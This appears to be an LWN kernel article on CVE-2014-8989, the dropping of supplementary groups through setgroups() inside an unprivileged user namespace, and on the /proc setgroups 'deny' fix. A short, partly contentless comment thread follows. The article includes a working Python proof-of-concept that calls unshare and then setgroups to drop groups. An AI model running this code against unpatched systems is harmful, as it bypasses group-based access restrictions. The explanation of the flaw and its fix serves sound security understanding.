User namespaces and setgroups()
Group membership can be used to restrict privilege in a couple of ways. Access control lists can explicitly block access to a resource on the basis of membership in a particular group. But it is even simpler than that: if a file's protection bits are set for "no group access," a process belonging to that group will be blocked, even if the file is otherwise accessible by the world as a whole. In either case, the ability to drop a group can enable a process to access a resource that would have otherwise been denied to it.
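The "no group access" case can be illustrated with a simplified model of the classic owner/group/other check. This is only a sketch: the function name `may_read` and the numeric IDs are made up for illustration, and ACLs and capabilities are ignored.

```python
import stat

def may_read(mode, file_uid, file_gid, proc_uid, proc_gids):
    """Simplified owner/group/other read check (no ACLs, no capabilities).

    Exactly one permission class is consulted: owner bits if the process
    owns the file, else group bits if the process is in the file's group,
    else the "other" bits.
    """
    if proc_uid == file_uid:
        return bool(mode & stat.S_IRUSR)
    if file_gid in proc_gids:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)

# Hypothetical file: mode 0604 (world-readable, no group access), group 60.
blocked = may_read(0o604, 0, 60, proc_uid=1000, proc_gids={1000, 60})
allowed = may_read(0o604, 0, 60, proc_uid=1000, proc_gids={1000})
print(blocked, allowed)
```

A process that belongs to group 60 is refused, while the same process without that membership falls through to the "other" bits and is allowed, which is why dropping a group can widen access.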
In current kernels, using setgroups() to change a process's group membership is a privileged operation. So unprivileged processes cannot use it to get rid of any inconvenient group memberships. But a process running within a user namespace is privileged inside that namespace, so a setgroups() call there will succeed. It is easy to write a little program that uses clone() to create a child in a user namespace and has the child call setgroups() to drop membership in all supplementary groups. This privilege-escalation vulnerability has become known as CVE-2014-8989.
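A rough sketch of such a program follows. It is an approximation rather than the original exploit: it uses fork() followed by unshare(CLONE_NEWUSER), called through ctypes, as a stand-in for the clone() call described above, and the function names are invented for illustration. On a kernel carrying the fix, the setgroups() call is expected to be refused; in containers and sandboxes the unshare() call itself may be refused.

```python
import ctypes
import os

CLONE_NEWUSER = 0x10000000  # value from <linux/sched.h>

def _attempt():
    """Runs in the child: enter a new user namespace, then try to drop groups."""
    try:
        libc = ctypes.CDLL(None, use_errno=True)
        if libc.unshare(CLONE_NEWUSER) != 0:
            return "unshare failed: " + os.strerror(ctypes.get_errno())
        try:
            os.setgroups([])  # the call that the fix restricts
            return "setgroups succeeded: supplementary groups dropped"
        except OSError as exc:
            return "setgroups refused: " + os.strerror(exc.errno)
    except Exception as exc:  # for example, a platform without unshare()
        return "not attempted: " + repr(exc)

def try_drop_groups_in_userns():
    """Fork a child, run the attempt there, and return its report as a string."""
    read_end, write_end = os.pipe()
    pid = os.fork()
    if pid == 0:
        os.close(read_end)
        try:
            os.write(write_end, _attempt().encode())
        finally:
            os._exit(0)
    os.close(write_end)
    with os.fdopen(read_end) as pipe:
        report = pipe.read()
    os.waitpid(pid, 0)
    return report or "child exited without reporting"

print(try_drop_groups_in_userns())
```

The attempt runs in a child so that the calling process never leaves its own namespace; the result depends entirely on the kernel version and on any sandboxing in effect.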
Eric's fix for this problem starts by disabling the use of setgroups() within a user namespace until a group-ID mapping has been set up for that namespace. That mapping is created by writing the file gid_map in the process's /proc directory; see this article for details on how the mapping files work. Other user- or group-ID-oriented system calls require the existence of a mapping before they will succeed; setgroups() now has that restriction as well.
The biggest part of the patch adds a new control file, called setgroups, to the /proc directory for each process. Writing the string "deny" to that file will disable the setgroups() system call entirely within the namespace containing the relevant process. The CAP_SYS_ADMIN capability is required, so random processes cannot disable setgroups() in the top-level namespace; once again, a process within its own user namespace is privileged (by default) and can make this change successfully. Once setgroups() has been turned off, it cannot be enabled again in that namespace or any of its descendants. The setgroups file can only be written to before the group-ID mapping has been set.
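The ordering constraint can be sketched as a small helper that writes the two files in the required sequence. The helper name and its parameters are hypothetical; `proc_dir` would be something like `/proc/<pid>` for a process inside the new namespace, and the single-line `gid_map` format used here is "ID inside, ID outside, range length".

```python
import os

def deny_setgroups_then_map_gid(proc_dir, inner_gid, outer_gid):
    """Write "deny" to <proc_dir>/setgroups, then a one-entry gid_map.

    The setgroups file must come first, since it can only be written
    before the group-ID mapping exists.
    """
    with open(os.path.join(proc_dir, "setgroups"), "w") as f:
        f.write("deny")
    # gid_map line: <ID inside namespace> <ID outside namespace> <length>
    with open(os.path.join(proc_dir, "gid_map"), "w") as f:
        f.write(f"{inner_gid} {outer_gid} 1")

# Possible use from inside a freshly created user namespace (not run here):
#   gid = os.getgid()
#   deny_setgroups_then_map_gid("/proc/self", gid, gid)
```

Taking the directory as a parameter keeps the helper usable against either the caller's own `/proc/self` or the `/proc` entry of a child it has just created.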
Finally, an unprivileged process can only change the group-ID mapping of a namespace if setgroups() has been disabled. The only thing an unprivileged process can do with the group-ID mapping is to map its own primary group ID to the same ID in the parent namespace; an unprivileged process is not able to remap its supplementary groups. So, with this set of restrictions in place, it essentially becomes impossible to (1) play tricks with mappings to drop groups, or (2) call setgroups() at all without privilege.
Note that if a privileged process creates a user namespace, it can set up arbitrary mappings for group IDs and decline to disable setgroups(). That would make the dropping of groups within the namespace possible, but, since the process is already privileged, it could do that anyway.
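The rules described above can be summarized as a toy decision model. This is not kernel code; the class and function names are invented, and "privileged" is reduced to a single boolean for the sake of the sketch.

```python
from dataclasses import dataclass

@dataclass
class UserNamespace:
    gid_map_written: bool = False   # has gid_map been set up?
    setgroups_denied: bool = False  # has "deny" been written to setgroups?

def may_write_setgroups_file(ns):
    # The setgroups file is only writable before the mapping exists.
    return not ns.gid_map_written

def may_write_gid_map(ns, creator_is_privileged):
    # An unprivileged creator must disable setgroups() first.
    return creator_is_privileged or ns.setgroups_denied

def may_call_setgroups(ns):
    # Needs a mapping, and must not have been disabled for the namespace.
    return ns.gid_map_written and not ns.setgroups_denied

# Unprivileged creator: forced to deny setgroups() before mapping.
unpriv = UserNamespace()
assert not may_write_gid_map(unpriv, creator_is_privileged=False)
unpriv.setgroups_denied = True
assert may_write_gid_map(unpriv, creator_is_privileged=False)
unpriv.gid_map_written = True
assert not may_call_setgroups(unpriv)

# Privileged creator: may map without denying, so setgroups() stays usable.
priv = UserNamespace(gid_map_written=True)
assert may_call_setgroups(priv)
```

In this model, the only namespaces in which setgroups() can succeed are those whose mapping was written by a creator that was already privileged, which matches the argument that nothing new is being granted.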
The end result of all this work should be the closing of the vulnerability caused by being able to drop groups within a user namespace. But it highlights one of the hazards that come with the user namespace territory: while it seems possible to contain privilege within a user namespace, there is always the possibility of surprises like this one hiding in the corners of the system. It may be some time yet before we can be truly confident that all of those surprises have been found and that the unprivileged creation of user namespaces is truly a safe thing to allow.
Eric has asked Linus to pull these changes for the 3.19 development cycle; that pull happened just as this week's Edition was going to press. The patches have been marked for stable backporting as well, so they should eventually become available in the stable update series.
Index entries for this article | |
---|---|
Kernel | Namespaces/User namespaces |
Kernel | Negative groups |
Kernel | Security/Namespaces |
Posted Dec 18, 2014 18:34 UTC (Thu)
by josh (subscriber, #17465)
[Link] (5 responses)
Precisely because I'm waiting for the fallout from the patches described in this article before doing so. Once whatever patch is going to go in does so, I plan to send out a new version of both the setusers and unprivileged setgroups patches, the latter having some combination of compile-time and runtime enabling switches.
Posted Dec 18, 2014 21:37 UTC (Thu)
by zlynx (guest, #2285)
[Link] (4 responses)
Posted Dec 18, 2014 21:45 UTC (Thu)
by zlynx (guest, #2285)
[Link] (2 responses)
I'm not sure Windows is the very best security model to copy, but it is an idea. :-)
Posted Dec 18, 2014 22:20 UTC (Thu)
by bronson (subscriber, #4806)
[Link] (1 responses)
Posted Dec 19, 2014 10:34 UTC (Fri)
by etienne (guest, #25256)
[Link]
Possible to make it sane by supporting something like (in /etc/group):
games:x:60:-user1,-user2
which would mean everybody but those listed?
Posted Dec 18, 2014 21:54 UTC (Thu)
by josh (subscriber, #17465)
[Link]
Posted Dec 23, 2014 20:09 UTC (Tue)
by rwmj (subscriber, #5474)
[Link]